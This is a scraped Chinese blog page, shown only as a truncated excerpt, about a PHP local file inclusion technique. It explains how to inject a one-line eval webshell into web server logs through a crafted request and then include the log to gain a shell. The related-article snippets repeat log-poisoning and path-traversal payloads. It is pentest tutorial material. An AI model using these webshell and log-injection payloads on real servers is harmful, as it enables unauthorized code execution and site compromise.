PHP本地包含漏洞的新突破口

最新推荐文章于 2024-02-16 08:00:00 发布
原创 最新推荐文章于 2024-02-16 08:00:00 发布 · 360 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #cmd #web服务 #web

<?/**/eval($_POST[cmd]);/**/?>

这样的GET请求,将一句话木马写入web日志,然后利用文件包含漏洞包含日志得到WEBSHELL,如milw0rm上的这个EXP:

http://www.milw0rm.com/exploits/4029

不过很遗憾,这类情况只能在short_open_tag=on的情况下才能有效,当short_open_tag=off时,PHP将不支持<?/**/eval($_POST[cmd]);/**/?>这样的短语句.

所以我们只能使用<?php eval($_POST[cmd]);?>这样标准语法的一句话木马,但是问题来鸟,语句中有一个空格,类似

http://www.exp.com/index<?php eval($_POST[cmd]);?>.php

这样的提交,WEB服务器将会把空格做HTTP编码转成%20写入web日志,如果PHP包含<?php%20eval($_POST[cmd]);?>这样的语句肯定是不会成功的,所以我们必须把空格真正的写入WEB日志.

 

 

 

>>阅读全文

w303972870
关注
PHP文件包含漏洞 日志
课嗨教育的专栏
11-13 359
一般虚拟主机都有自己独立的日志,是可读可写的 但是UBUNTU默认装的APACHE权限很低,对日志不可读 我们可以包含日志 在这里%3C%3Fphpinfo%28%29%3B%3F%3E这句就是转换过了的<?phpinfo();?>,我们提交 http://www.123.com/%3C%3Fphpinfo%28%29%3B%3F%3E 这样肯定会报出错找不到页面,而一出错就被记在错误日志里了 http://xxx.com/z.php?zizzy=/home/user/www.xxx.
渗透测试之突破口——web服务突破
m0_61506558的博客
10-17 753
任意用户注册可爆破用户名爆破用户名,密码用户名注入万能密码用户名Xss修改返回包信息,登入他人账户修改cookie中的参数,如user,adminid等HTML源码、JS等查看信息搜集一章后台登录参数修改为注册参数/reg、/register、/sign等密码重置1.重置一个账户,不发送验证码,设置验证码为空发送请求。2.发送验证码,查看相应包3.验证码生存期的爆破4.修改相应包为成功的相应包5.手工直接跳转到校验成功的界面。
邪恶的空格-PHP本地文件包含漏洞突破口!
weixin_30640291的博客
06-07 118
http://www.exp.com/index<?/**/eval($_POST[cmd]);/**/?>.php这样的GET请求,将一句话木马写入web日志,然后利用文件包含漏洞包含日志得到WEBSHELL,如milw0rm上的这个EXP:http://www.milw0rm.com/exploits/4029不过很遗憾,这类情况只能在short_open_tag=on的情况下才能...
php本地文件包含漏洞,邪恶的空格-PHP本地文件包含漏洞突破口
weixin_34649252的博客
03-09 156
来源:茄子乱语PS:文章说的出错鸟,事后剑心提醒我才发现,有忽悠人的嫌疑,Connection HTTP标头和能不能写入空格无关!!记得Zizzy写过一篇《关于php包含Apache日志的随想》,这是一个很好的思路,我们可以随意构造http://www.exp.com/index/**/eval($_POST[cmd]);/**/?>.php这样的GET请求,将一句话木马写入web日志,然后...
PHP文件包含漏洞详解
热门推荐
xysoul的专栏
06-30 1万+
http://tieba.baidu.com/p/2310282657 什么是”远程文件包含漏洞”?服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。 一、什么才是”远程文件包含漏洞”? 回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以
php本地包含漏洞日志,利用nginx日志结合本地包含漏洞GetShell
weixin_42345868的博客
03-28 420
0前言在WEB渗透测试中尤其是PHP,经常会挖到LFI漏洞,想要GETSHELL,但无奈没有文件上传的途径,这里给一个思路,抛砖引玉。近日施耐德电气爆出的漏洞,首先得到了一个本地包含,在这里作为靶目标使用。1.本地获得利用思路umotion/themes/schneider/include/css.php?css=../../../../../../../etc/nginx&theme=i...
PHP反序列化漏洞-从入门到提升
AkangBoy的博客
11-09 1867
本文从PHP序列化原理讲起,逐渐深入到PHP反序列化及其漏洞,几乎每个知识点都配有代码演示,十分方便理解,希望对你们有所帮助!
文件包含漏洞拓扑结构
最新发布
03-01
- 定期审查第三方类库的质量状况确保它们不会成为突破口。 ```python import os.path def safe_file_inclusion(user_input, base_dir="/var/www/html"): sanitized_path = os.path.normpath(os.path.join...
上传漏洞-----笔记
tell_me_404的博客
03-02 889
一、文件解析漏洞 解析漏洞主要说的是一些特殊文件被IIS、Apache、Nginx在某些情况下解释成脚本文件格式的漏洞。 1、IIS 5.x/6.0解析漏洞 一般是配合编辑器使用(CKFinder、fck这两个编辑器是可以创建目录的) IIS6.0解析漏洞利用方法有两种: 1.1、目录解析 /xx.asp/xx.jpg 在网站下建立文件夹的名字为.asp、.asa的文件夹,启母路内的任何扩展名的文...
文件上传漏洞:upload-labs靶场通关
qq_68163788的博客
02-16 4901
upload-labs是一个专注于Web安全的在线靶场,旨在帮助安全研究人员和学习者提升对Web安全的理解和技能。该靶场提供了丰富的漏洞场景和挑战,涵盖了常见的Web安全漏洞类型,包括但不限于SQL注入、XSS跨站脚本攻击、CSRF跨站请求伪造、文件上传漏洞等。 通过upload-labs,用户可以在真实的环境中进行漏洞挖掘和漏洞利用的实践,学习并掌握各种常见的Web安全攻防技术。靶场提供了丰富的学习资源和提示,帮助用户理解漏洞的原理和挖掘漏洞的方法,同时还提供了实时的漏洞利用演示,帮助用户更好地理解漏洞
文件包含漏洞原理与实践
yz_weixiao的博客
02-20 370
文件包含漏洞常出现在「PHP语言」中。PHP为了提高「代码复用性」,提供了文件包含函数include()和require(),被包含文件内容会被当做代码来执行。就像造轮子一样:把「重复使用」的一段代码,单独写到一个文件里,再用文件包含函数来包含这个文件。为了灵活的包含文件,一些程序员会把文件名通过「参数」的形式传递给文件包含函数。当传递文件名的参数可以被用户「修改」时,用户就可以包含任意文件,而文件中的代码就会被服务器执行,这就造成了文件包含漏洞
渗透之路 WEB漏洞【第六篇】文件包含漏洞
dfu65065的博客
09-20 266
包含漏洞简介 包含操作,在大多数Web语言中都会提供的功能,但PHP对于包含文件所提供的功能太强大,太灵活,所以包含漏洞经常出现在PHP语言中,这也就导致了出现了一个错误现状,很多初学者认为包含漏洞只出现PHP语言之中,殊不知在其他语言中可能出现包含漏洞PHP包含漏洞分类 PHP中的四个包含文件函数include(),include_once(),require()和requi...
php本地包含
kali_linux的专栏
01-02 1058
php渗透测试 php文件包含 演示
漏洞复现篇——文件包含漏洞进阶-日志文件漏洞
爱国小白帽
02-19 1931
日志文件漏洞原理 当某个PHP文件存在本地包含漏洞,而却无法上传正常文件,这就意味这有包含漏洞却不能拿来利用,这时攻击者就有可能会利用apache日志文件来入侵。 Apache服务器运行后会生成两个日志文件,这两个文件是access.log(访问日志)和error.log(错误日志),apache的日志文件记录下我们的操作,并且写到访问日志文件access.log之中 例如:http://192...
墨者学院PHP本地包含漏洞代码溯源
liangzi321321的博客
09-03 544
打开靶场显示的是一个看似普通的网页,查看网页源码,发现有一些注释 <!--r.php文件源码如下 本关通关key保存在系统根目录the_key_is_here.txt中 -> <?php $p=($_GET["p"].".txt"); $pics=file($p); for($i=0;$i< count($pics);$i++) { echo $pics[$i]; ...
PHP文件包含与一句话木马实验代码
a2788656708的博客
12-03 3335
文件包含 1.phpinfo.php文件 2.用include语句包含phpinfo.php文件 3.浏览器访问 1.利用require 语句包含phpinfo.php文件 2.浏览器访问 一句话木马 ASSERT函数 1.利用assert函数创建get.php 2.浏览器访问 在url中 ip地址后输入 cmd=system("whoami"); 1.利用assert函数创建post.php 2.浏览器访问 在post data 栏 输入 ...
php文件包含漏洞
dust_hk的博客
03-03 2881
相关函数 php中引发文件包含漏洞的通常是一下四个函数: 1.include() 2.include_once() 3.require() 4.require_once() require()如果在包含的过程中有错,比如文件存在等,直接退出,不会继续执行后续语句。 include()如果出错的话,只会提出警告,会继续执行后续语句。 require_once()和include_once()功能与...
突破上传文件包含漏洞以及修复方案
pygain的博客
10-11 7840
1.文件包含功能概述 对一个简单的 PHP 小程序来说,在不同的 PHP 脚本之间剪切或复制某一函数不是大问题, 但是当进入项目开发时,函数的数量将会变得相当庞大,并且函数具有较强的复杂性,这时你就会把它们保存到一个便于随时调用的函数库中,以便于该函数在整个项目中可以随时被调用。通常情况下这个函数库是一个文件,我们称为代码库。当为特定领域的功能编写函数时,希望通过把自定义的这些函数组织到一起,并
渗透测试之文件包含漏洞
weixin_45380284的博客
03-06 975
文件包含漏洞: 理论: 文件包含: 编写程序时把重复使用的函数写到单个文件中,在使用这些函数的时候,直接调用此文件,就无需再次编写,这种调用文件的过程叫做包含 文件包含漏洞: 开发人员希望代码更加灵活,所以会将被包含文件设置为变量,用来动态调用。 文件包含漏洞产生的原因就是函数通过变量引入文件时,没有对传入的文件名进行合理的校验,从而操作了预想之外的文件,这样就导致了意外的文件泄露甚至恶意代码注入。 文件包含函数: PHP中提供文件包含的函数: include() 找不到被包含文件时只产生警告 inc
PHP通用包含漏洞源码下载与网络安全解析
标题 "php包含漏洞源码" 指出了本文档所关注的是与PHP编程语言相关的安全漏洞问题,即包含漏洞漏洞是软件安全中非常关键的问题,它们可以被黑客利用来执行未授权的操作,比如获取敏感数据、执行恶意代码等。在PHP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值